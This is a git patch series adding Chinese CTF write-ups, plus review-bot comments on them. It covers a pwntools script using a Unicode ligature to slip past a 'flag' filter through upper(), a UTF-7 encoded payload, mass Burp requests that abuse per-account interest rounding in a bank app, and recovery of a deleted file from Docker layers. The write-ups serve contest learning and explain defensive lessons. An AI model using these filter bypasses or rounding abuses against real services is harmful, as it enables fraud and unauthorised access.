From d25184614cd9703bebde6fce12afece1ac409fce Mon Sep 17 00:00:00 2001 From: NaiveTomcat Date: Sat, 7 Nov 2020 12:51:15 +0800 Subject: [PATCH 1/3] added two wps --- .../NaiveTomcat/2020-11-07-字符串工具WP.md | 42 +++++++++++++++++++ players/NaiveTomcat/2020-11-07-狗狗银行WP.md | 25 +++++++++++ 2 files changed, 67 insertions(+) create mode 100644 players/NaiveTomcat/2020-11-07-字符串工具WP.md create mode 100644 players/NaiveTomcat/2020-11-07-狗狗银行WP.md diff --git a/players/NaiveTomcat/2020-11-07-字符串工具WP.md b/players/NaiveTomcat/2020-11-07-字符串工具WP.md new file mode 100644 index 0000000..513af7d --- /dev/null +++ b/players/NaiveTomcat/2020-11-07-字符串工具WP.md @@ -0,0 +1,42 @@ +--- +layout: post +title: 字符串工具WP +catalog: true +tags: + - CTF + - Hack +--- + +## 大小写转换 + +### 思路 + +本问利用Unicode连字U+FB02(fl连写),该字符被传入python的upper()方法后会被转为FL, +进而达到绕过过滤的方法 + +### 脚本 + +```python +#!/usr/bin/python +import pwn +token="token" +p=pwn.remote("202.38.93.111",10233) +p.sendline(token) +p.recvuntil("2. Convert my UTF-7 string to UTF-8!!") +p.sendline("1") +p.recvuntil("Welcome to the capitalizer tool, please input your string:") +payload="\ufb02\u0061\u0067" +p.sendline(payload) +p.interactive() +``` + +## UTF-7到UTF-8转换 + +### 思路 + +本问利用UTF-7编码规则,将flag中每个字母扩充为双字节(即在前面加/x00),整体base64编码 +并在最前面加上“+”以及去除末尾“=”,发送到服务,被UTF-7解码成flag进而获取flag + +### payload + +`+AGYAbABhAGc` diff --git a/players/NaiveTomcat/2020-11-07-狗狗银行WP.md b/players/NaiveTomcat/2020-11-07-狗狗银行WP.md new file mode 100644 index 0000000..51d2e8e --- /dev/null +++ b/players/NaiveTomcat/2020-11-07-狗狗银行WP.md 
@@ -0,0 +1,25 @@ +--- +layout: post +title: 狗狗银行WP +catalog: true +tags: + - CTF + - Hack +--- + +## 切入点 + +后端计算利息的近似方法为四舍五入,故构造合理余额可使得借记卡利息达到0.6%,高于信用卡的0.5%从而获取利润 + +## 解题方法 + +分析创建卡、转账的请求,使用burp的intruder批量发包,首先自行手动创建一张信用卡,再通过burp批量创建998张借记卡 +(为了满足题目新增要求),再通过burp从信用卡向每一张新增的信用卡转账167元 + +吃饭后,此时,每张卡都会有理论0.501元的利息,经过后端计算舍入得1元利息,共获得998元利息,而信用卡欠款166666元, +利息833.33元,有164元差额。除去吃饭的10元仍有利润。重复几天就可以使净资产大于2000。 + +## 错误解题方法 + +看到题我的第一思路是整型溢出,于是借了很多钱,用burp请求/api/eat很多次,最后返回的欠款有2^1000不止。后端应该用 +的BigDecimal,不会出现溢出。 From 818890f10eef5c779def44ba726f75da57ff2a9f Mon Sep 17 00:00:00 2001 From: NaiveTomcat Date: Sat, 7 Nov 2020 13:00:30 +0800 Subject: [PATCH 2/3] Added wp for opengl and docker --- players/NaiveTomcat/2020-11-07-dockerWP.md | 13 ++++++++ .../2020-11-07-超简陋的OpenGL小程序WP.md | 30 +++++++++++++++++++ 2 files changed, 43 insertions(+) create mode 100644 players/NaiveTomcat/2020-11-07-dockerWP.md create mode 100644 players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md diff --git a/players/NaiveTomcat/2020-11-07-dockerWP.md b/players/NaiveTomcat/2020-11-07-dockerWP.md new file mode 100644 index 0000000..da739bb --- /dev/null +++ b/players/NaiveTomcat/2020-11-07-dockerWP.md @@ -0,0 +1,13 @@ +--- +layout: post +title: Docker WP +catalog: true +tags: + - CTF + - Hack +--- + +## 思路 + +`/var/lib/docker/overlay2`中有pull下来的docker镜像的文件,而这个docker的构建是先有flag.txt +后来删除的,于是就能在这个目录中搜索到flag.txt。 diff --git a/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md b/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md new file mode 100644 index 0000000..41be91e --- /dev/null +++ b/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md 
@@ -0,0 +1,30 @@ +--- +layout: post +title: 超简陋的OpenGL小程序WP +catalog: true +tags: + - CTF + - Hack +--- + +## 思路 + +着色器脚本中更改视角和光源位置,更改完后运行即可 + +## patch + +basic_lighting.fs +```diff +19c19 +< vec3 lightDir = normalize(-0.9* lightPos + FragPos); +--- +> vec3 lightDir = normalize(lightPos - FragPos); +``` + +basic_lighting.vs +```diff +14c14 +< FragPos = vec3(-1 *model * vec4(aPos, 1.0)); +--- +> FragPos = vec3(model * vec4(aPos, 1.0)); +``` From be66019e423807f7f97a7397f9f219d54b78453d Mon Sep 17 00:00:00 2001 From: NaiveTomcat Date: Sat, 7 Nov 2020 13:21:01 +0800 Subject: [PATCH 3/3] Removed yaml front matter --- players/NaiveTomcat/2020-11-07-dockerWP.md | 9 +-------- players/NaiveTomcat/2020-11-07-字符串工具WP.md | 9 +-------- players/NaiveTomcat/2020-11-07-狗狗银行WP.md | 9 +-------- players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md | 9 +-------- 4 files changed, 4 insertions(+), 32 deletions(-) diff --git a/players/NaiveTomcat/2020-11-07-dockerWP.md b/players/NaiveTomcat/2020-11-07-dockerWP.md index da739bb..8920e94 100644 --- a/players/NaiveTomcat/2020-11-07-dockerWP.md +++ b/players/NaiveTomcat/2020-11-07-dockerWP.md @@ -1,11 +1,4 @@ ---- -layout: post -title: Docker WP -catalog: true -tags: - - CTF - - Hack ---- +# Docker WP ## 思路 diff --git a/players/NaiveTomcat/2020-11-07-字符串工具WP.md b/players/NaiveTomcat/2020-11-07-字符串工具WP.md index 513af7d..9b87938 100644 --- a/players/NaiveTomcat/2020-11-07-字符串工具WP.md +++ b/players/NaiveTomcat/2020-11-07-字符串工具WP.md @@ -1,11 +1,4 @@ ---- -layout: post -title: 字符串工具WP -catalog: true -tags: - - CTF - - Hack ---- +# 字符串工具WP ## 大小写转换 diff --git a/players/NaiveTomcat/2020-11-07-狗狗银行WP.md b/players/NaiveTomcat/2020-11-07-狗狗银行WP.md index 51d2e8e..019bf36 100644 --- a/players/NaiveTomcat/2020-11-07-狗狗银行WP.md +++ b/players/NaiveTomcat/2020-11-07-狗狗银行WP.md @@ -1,11 +1,4 @@ ---- -layout: post -title: 狗狗银行WP -catalog: true -tags: - - CTF - - Hack ---- +# 狗狗银行WP ## 切入点 
diff --git a/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md b/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md index 41be91e..1ea7373 100644 --- a/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md +++ b/players/NaiveTomcat/2020-11-07-超简陋的OpenGL小程序WP.md @@ -1,11 +1,4 @@ ---- -layout: post -title: 超简陋的OpenGL小程序WP -catalog: true -tags: - - CTF - - Hack ---- +# 超简陋的OpenGL小程序WP ## 思路
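Review bot: In the 字符串工具 hunk of PATCH 1/3, the script's shebang `#!/usr/bin/python` does not match the payload literal `payload="\ufb02\u0061\u0067"`: `\u` escapes are only interpreted in plain string literals under Python 3, so under a Python 2 interpreter the service would receive the literal backslash sequence rather than U+FB02. Use `#!/usr/bin/env python3` (or a `u"..."` literal) so the script behaves as the 思路 section describes. The 思路 paragraph would also benefit from one sentence stating the defensive lesson it demonstrates: `str.upper()` can map a single code point (the ﬂ ligature) to two ASCII letters, so any filter that inspects the input before case conversion checks a different string from the one that is used afterwards; validation has to run on the final, normalized value. Keeping `token="token"` as a placeholder rather than the real token is the right call for a committed file.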
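Review bot: In the 狗狗银行 hunk of PATCH 1/3, the sentence "再通过burp从信用卡向每一张新增的信用卡转账167元" contradicts the preceding sentence, which says the 998 newly created cards are 借记卡; it should read "每一张新增的借记卡", and the arithmetic that follows (998 × 167 = 166666 元 of credit-card debt) only works under that reading. The 切入点 section states that rounding lifts the effective debit rate to 0.6% but never names the nominal per-card rate that yields the "理论0.501元" figure; stating it would let a reader verify why 167 元 is the smallest balance whose interest rounds up. It would also be worth noting the root cause for the defender's side: interest is rounded per account instead of being accumulated in fractional units or rounded once on the aggregate, which is what makes splitting funds across many small accounts profitable.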
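Review bot: In the dockerWP hunk of PATCH 2/3, the 思路 paragraph describes where the file was found but not why it was still there: deleting flag.txt in a later build step only records a whiteout entry in the upper overlay2 layer, while the lower layer that originally added the file remains part of the image and is extracted to `/var/lib/docker/overlay2` on pull. A one-sentence mitigation would round the writeup out, for example that secrets must never be written into an image layer at all, and that a multi-stage build copies only the intended artifacts into the final image so earlier layers are not shipped.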
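Review bot: In the 超简陋的OpenGL小程序 hunk of PATCH 2/3, the two `diff` blocks use ed-style `19c19` / `14c14` output without saying which side is the challenge's original file; add a line stating that `<` is the shipped (broken) line and `>` is the corrected one. The 思路 sentence says the fix changes 视角 and 光源位置, but the patch itself only restores `lightDir = normalize(lightPos - FragPos)` in the fragment shader and removes the `-1 *` sign flip on `FragPos` in the vertex shader; the description should match what the hunk actually changes. The bare `basic_lighting.fs` and `basic_lighting.vs` lines directly above each fence render as plain paragraphs, so formatting them as inline code or list items would make the file names stand out.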
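Review bot: In the dockerWP hunk of PATCH 3/3 (and identically in the three sibling hunks), the change does more than the subject "Removed yaml front matter" states: each file also gains a `+# <title>` H1 line, and the removed `tags` list (CTF, Hack) is the only categorisation the posts carried. The commit message should mention the added heading, and if the target site relies on tags for navigation the loss should be called out or the tags preserved elsewhere.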